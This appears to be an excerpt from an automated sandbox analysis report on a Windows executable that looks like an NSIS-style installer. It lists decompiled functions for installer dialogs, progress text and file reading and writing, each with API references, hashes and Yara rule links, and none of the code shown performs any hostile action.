                                                                                                    • Instruction Fuzzy Hash: B761E231A40215ABDB20DF64DE49B9E7BB4EB04315F20407BF904B62D2D7BC9E458B9C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                    0x00403f91
                                                                                                    0x00404025
                                                                                                    0x00000000
                                                                                                    0x00404025
                                                                                                    0x00403fa2
                                                                                                    0x00403fa6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00403fac
                                                                                                    0x00403fb5
                                                                                                    0x00403fb8
                                                                                                    0x00403fb8
                                                                                                    0x00403fbe
                                                                                                    0x00403fc4
                                                                                                    0x00403fc4
                                                                                                    0x00403fd0
                                                                                                    0x00403fd6
                                                                                                    0x00403fdd
                                                                                                    0x00403fe0
                                                                                                    0x00403fe3
                                                                                                    0x00403fe5
                                                                                                    0x00403fe5
                                                                                                    0x00403fed
                                                                                                    0x00403ff3
                                                                                                    0x00403ff3
                                                                                                    0x00403ffd
                                                                                                    0x00404002
                                                                                                    0x00404005
                                                                                                    0x0040400a
                                                                                                    0x0040400d
                                                                                                    0x0040400d
                                                                                                    0x0040401d
                                                                                                    0x0040401d
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 2320649405-0
                                                                                                    • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                    • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                                    • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                    • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402F18, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E00402F18(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				long _t36;
				long _t38;
				long _t43;
				long _t44;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t44 = _t31 +  *0x423ef8;
					 *0x417044 = _t44;
					SetFilePointer( *0x409018, _t44, 0, 0);
				}
				_t57 = 4;
				_t32 = E00403043(_t57);
				if(_t32 >= 0) {
					if(ReadFile( *0x409018,  &_a4, _t57,  &_v8, 0) == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x417044 =  *0x417044 + _t57;
						_t32 = E00403043(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								if(ReadFile( *0x409018, _a12, _t36,  &_v8, 0) == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x417044 =  *0x417044 + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										if(ReadFile( *0x409018, 0x413040, _t55,  &_v8, 0) == 0 || _t55 != _v8) {
											goto L23;
										}
										if(WriteFile(_a8, 0x413040, _v8,  &_a16, 0) == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x417044 =  *0x417044 + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}













                                                                                                    0x00402f1d
                                                                                                    0x00402f27
                                                                                                    0x00402f30
                                                                                                    0x00402f34
                                                                                                    0x00402f3f
                                                                                                    0x00402f3f
                                                                                                    0x00402f47
                                                                                                    0x00402f49
                                                                                                    0x00402f50
                                                                                                    0x00402f70
                                                                                                    0x00403039
                                                                                                    0x00403039
                                                                                                    0x00000000
                                                                                                    0x00402f7f
                                                                                                    0x00402f82
                                                                                                    0x00402f88
                                                                                                    0x00402f8f
                                                                                                    0x00402f92
                                                                                                    0x00402f9b
                                                                                                    0x00403008
                                                                                                    0x0040300e
                                                                                                    0x00403010
                                                                                                    0x00403010
                                                                                                    0x00403026
                                                                                                    0x00000000
                                                                                                    0x00403028
                                                                                                    0x00403028
                                                                                                    0x0040302b
                                                                                                    0x00403031
                                                                                                    0x00000000
                                                                                                    0x00403031
                                                                                                    0x00402f9d
                                                                                                    0x00402fa0
                                                                                                    0x00403034
                                                                                                    0x00403034
                                                                                                    0x00402fa6
                                                                                                    0x00402fab
                                                                                                    0x00402fab
                                                                                                    0x00402fb3
                                                                                                    0x00402fb5
                                                                                                    0x00402fb5
                                                                                                    0x00402fca
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402fe6
                                                                                                    0x00403004
                                                                                                    0x0040303b
                                                                                                    0x0040303b
                                                                                                    0x00402fed
                                                                                                    0x00402fed
                                                                                                    0x00402ff0
                                                                                                    0x00402ff3
                                                                                                    0x00402ff6
                                                                                                    0x00403000
                                                                                                    0x00000000
                                                                                                    0x00403002
                                                                                                    0x00000000
                                                                                                    0x00403002
                                                                                                    0x00403000
                                                                                                    0x00000000
                                                                                                    0x00402fe6
                                                                                                    0x00000000
                                                                                                    0x00402fab
                                                                                                    0x00402fa0
                                                                                                    0x00402f9b
                                                                                                    0x00402f92
                                                                                                    0x00402f70
                                                                                                    0x0040303c
                                                                                                    0x00403040

                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNEL32(00409130,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402F3F
                                                                                                    • ReadFile.KERNEL32(00409130,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EC4,000000FF,00000000,00000000,00409130), ref: 00402F6C
                                                                                                    • ReadFile.KERNEL32(00413040,00004000,?,00000000,00409130,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FC6
                                                                                                    • WriteFile.KERNEL32(00000000,00413040,?,000000FF,00000000,?,00402EC4,000000FF,00000000,00000000,00409130,?), ref: 00402FDE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: File$Read$PointerWrite
                                                                                                    • String ID: @0A
                                                                                                    • API String ID: 2113905535-1363546919
                                                                                                    • Opcode ID: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                    • Instruction ID: f0f891dec1baa82fcb152a6e3a42d02399587e043c2e4755ce28507b82245ee9
                                                                                                    • Opcode Fuzzy Hash: 3fc20a6f8204afd4db5be5275d6ec1a2b538eb21de19a3adc5be7867336c551b
                                                                                                    • Instruction Fuzzy Hash: 3F315731501249EBDB21CF55DD40A9E7FBCEB843A5F20407AFA05A6190D3789F81DBA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                    0x0040267c
                                                                                                    0x0040267e
                                                                                                    0x0040268a
                                                                                                    0x0040268d
                                                                                                    0x00402697
                                                                                                    0x0040269b
                                                                                                    0x0040269b
                                                                                                    0x004026a1
                                                                                                    0x004026ae
                                                                                                    0x004026b6
                                                                                                    0x004026b9
                                                                                                    0x004026bf
                                                                                                    0x004026cd
                                                                                                    0x004026d2
                                                                                                    0x004026d6
                                                                                                    0x004026d9
                                                                                                    0x004026e2
                                                                                                    0x004026ee
                                                                                                    0x004026f2
                                                                                                    0x004026f5
                                                                                                    0x004026ff
                                                                                                    0x0040271e
                                                                                                    0x00402706
                                                                                                    0x0040270b
                                                                                                    0x00402713
                                                                                                    0x00402716
                                                                                                    0x0040271b
                                                                                                    0x0040271b
                                                                                                    0x00402725
                                                                                                    0x00402725
                                                                                                    0x00402737
                                                                                                    0x0040273e
                                                                                                    0x00402750
                                                                                                    0x00402750
                                                                                                    0x00402756
                                                                                                    0x00402756
                                                                                                    0x00402761
                                                                                                    0x00402762
                                                                                                    0x00402766
                                                                                                    0x0040276a
                                                                                                    0x00402770
                                                                                                    0x00402770
                                                                                                    0x00402777
                                                                                                    0x00402164
                                                                                                    0x0040288e
                                                                                                    0x0040289a

                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                    • GlobalFree.KERNEL32 ref: 00402725
                                                                                                    • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                    • GlobalFree.KERNEL32 ref: 0040273E
                                                                                                    • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3294113728-0
                                                                                                    • Opcode ID: 3a1458f2ee606e527e74ceb4de6a296cb6a851380d50f1d8a5219405737086bc
                                                                                                    • Instruction ID: 719c612f4f238206e278f6e296a81204df483451b361404a9b6a09c3536a307a
                                                                                                    • Opcode Fuzzy Hash: 3a1458f2ee606e527e74ceb4de6a296cb6a851380d50f1d8a5219405737086bc
                                                                                                    • Instruction Fuzzy Hash: F831AD71C00128BBDF216FA4CD89DAE7E79EF08364F10423AF920772E0C6795D419BA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404F04, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00404F04(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405B88(0, _t39, 0x41fc78, 0x41fc78, _a4);
					}
					_t26 = lstrlenA(0x41fc78);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc78);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc78;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc78)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc78, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                    0x00404f0a
                                                                                                    0x00404f16
                                                                                                    0x00404f19
                                                                                                    0x00404f1f
                                                                                                    0x00404f2b
                                                                                                    0x00404f2e
                                                                                                    0x00404f31
                                                                                                    0x00404f37
                                                                                                    0x00404f37
                                                                                                    0x00404f3d
                                                                                                    0x00404f45
                                                                                                    0x00404f48
                                                                                                    0x00404f65
                                                                                                    0x00404f69
                                                                                                    0x00404f72
                                                                                                    0x00404f72
                                                                                                    0x00404f7c
                                                                                                    0x00404f85
                                                                                                    0x00404f91
                                                                                                    0x00404f98
                                                                                                    0x00404f9c
                                                                                                    0x00404f9f
                                                                                                    0x00404fb2
                                                                                                    0x00404fc0
                                                                                                    0x00404fc0
                                                                                                    0x00404fc4
                                                                                                    0x00404fc6
                                                                                                    0x00404fc9
                                                                                                    0x00000000
                                                                                                    0x00404fc9
                                                                                                    0x00404f4a
                                                                                                    0x00404f52
                                                                                                    0x00404f5a
                                                                                                    0x00404f60
                                                                                                    0x00000000
                                                                                                    0x00404f60
                                                                                                    0x00404f5a
                                                                                                    0x00404f48
                                                                                                    0x00404fd3

                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                    • lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                    • lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                    • SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 2531174081-0
                                                                                                    • Opcode ID: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                    • Instruction ID: 33d69ec58002f5e3cec48cf4aa7ac502a1da6879986bf9ca4026f821734cd723
                                                                                                    • Opcode Fuzzy Hash: 3060ff48176a0075549dcba78de7f639edbccfa172efc44d831dc49f1ba50047
                                                                                                    • Instruction Fuzzy Hash: C4219D71A00108BBDF119FA5CD849DEBFB9EB49354F14807AFA04B6290C3389E45CBA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402BD3, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00402BD3(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41704c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41704c = 0;
					return _t15;
				}
				if( *0x41704c != 0) {
					return E00405EC1(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x423eac) {
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B3B, 0);
						 *0x41704c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BB7());
						return E00404F04(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                    0x00402bdf
                                                                                                    0x00402be1
                                                                                                    0x00402be8
                                                                                                    0x00402beb
                                                                                                    0x00402beb
                                                                                                    0x00402bf1
                                                                                                    0x00000000
                                                                                                    0x00402bf1
                                                                                                    0x00402bff
                                                                                                    0x00000000
                                                                                                    0x00402c02
                                                                                                    0x00402c09
                                                                                                    0x00402c15
                                                                                                    0x00402c1d
                                                                                                    0x00402c5b
                                                                                                    0x00402c64
                                                                                                    0x00000000
                                                                                                    0x00402c69
                                                                                                    0x00402c26
                                                                                                    0x00402c37
                                                                                                    0x00000000
                                                                                                    0x00402c45
                                                                                                    0x00402c26
                                                                                                    0x00402c71

                                                                                                    APIs
                                                                                                    • DestroyWindow.USER32(?,00000000), ref: 00402BEB
                                                                                                    • GetTickCount.KERNEL32 ref: 00402C09
                                                                                                    • wsprintfA.USER32 ref: 00402C37
                                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                      • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                      • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                      • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                      • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                                      • Part of subcall function 00402BB7: MulDiv.KERNEL32(?,00000064,?), ref: 00402BCC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                    • String ID: ... %d%%
                                                                                                    • API String ID: 722711167-2449383134
                                                                                                    • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                    • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                                    • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                    • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                    0x004047e1
                                                                                                    0x004047ee
                                                                                                    0x004047f4
                                                                                                    0x00404832
                                                                                                    0x00404832
                                                                                                    0x00404841
                                                                                                    0x00404848
                                                                                                    0x00000000
                                                                                                    0x0040484a
                                                                                                    0x004047f6
                                                                                                    0x00404805
                                                                                                    0x0040480d
                                                                                                    0x00404810
                                                                                                    0x00404822
                                                                                                    0x00404828
                                                                                                    0x0040482f
                                                                                                    0x00000000
                                                                                                    0x0040482f
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
                                                                                                    • GetMessagePos.USER32 ref: 004047F6
                                                                                                    • ScreenToClient.USER32 ref: 00404810
                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                    • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                                    • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                    • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                    0x00402b48
                                                                                                    0x00402b56
                                                                                                    0x00402b5c
                                                                                                    0x00402b5c
                                                                                                    0x00402b6a
                                                                                                    0x00402b6c
                                                                                                    0x00402b78
                                                                                                    0x00402b7d
                                                                                                    0x00402b7f
                                                                                                    0x00402b7f
                                                                                                    0x00402b8a
                                                                                                    0x00402b9a
                                                                                                    0x00402bac
                                                                                                    0x00402bac
                                                                                                    0x00402bb4

                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                    • wsprintfA.USER32 ref: 00402B8A
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                                    • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-1158693248
